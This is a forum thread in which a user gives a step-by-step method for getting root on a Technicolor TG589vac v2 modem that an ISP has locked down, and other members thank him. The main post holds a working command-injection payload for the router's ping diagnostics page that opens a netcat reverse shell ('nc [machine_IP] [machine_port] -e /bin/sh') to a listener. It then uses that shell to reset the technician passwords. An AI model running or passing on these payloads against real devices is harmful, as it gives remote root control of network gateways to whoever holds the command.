LebGeeks

A community for technology geeks in Lebanon.

You are not logged in.

#1 October 19 2019

wollyka
Member

Hacking the Technicolor TG589vac v2

Hi
IDM is using Technicolor TG589vac v2 as their  VDSL2+ modem but they have blocked SSH login (they changed the default passwords so you can't access it)
However, i found out an old vulnerability that can be use to gain root access: LAN-side: Command injection in ping diagnostics.
1.    Set up a netcat listener on your machine, and adjust any firewall rules to allow an inbound connection (you can find netcat for windows too)

nc -lvvp [machine_port]

2.    Go to the ping/traceroute diagnostics page in the gateway’s Web management, and enter the following as the IP address for pinging:

:::::::;nc [machine_IP] [machine_port] -e /bin/sh

3.    Or what may be easier to see:

:::::::`nc [machine_IP] [machine_port] -e /bin/sh`

4.     In either case, that’s 7 or more colons followed by the usual metacharacter tricks for command injection. The -e switch is enabled in the firmware I’ve seen, but be sure to place the -e switch last, as shown, to avoid some quirks with the BusyBox implementation of netcat

5.    Click “Send Ping Request,” and the gateway should connect to your machine. You have now root access to the modem
6.    You can access the passwd command (search for it in the folders) and change the passwd for the technician and tech users.
7.    You can now use the new password and use SSH to log in to the modem and now i have UCI commands in the modem
8.    Voila! Have fun

I used the information from this link : https://weaponizedautism.wordpress.com/ … -gateways/

Last edited by wollyka (October 23 2019)

Offline

#2 October 20 2019

rolf
Member

Re: Hacking the Technicolor TG589vac v2

I don't have this modem, so I can't try it out, but thank you!

Offline

#3 October 20 2019

wollyka
Member

Re: Hacking the Technicolor TG589vac v2

You are welcome. I was pissed when I found out that I was locked out from accessing the modem. So I just had to find a way :)

Offline

#4 October 23 2019

Padre
Member

Re: Hacking the Technicolor TG589vac v2

Nice One ^.^

Offline

Board footer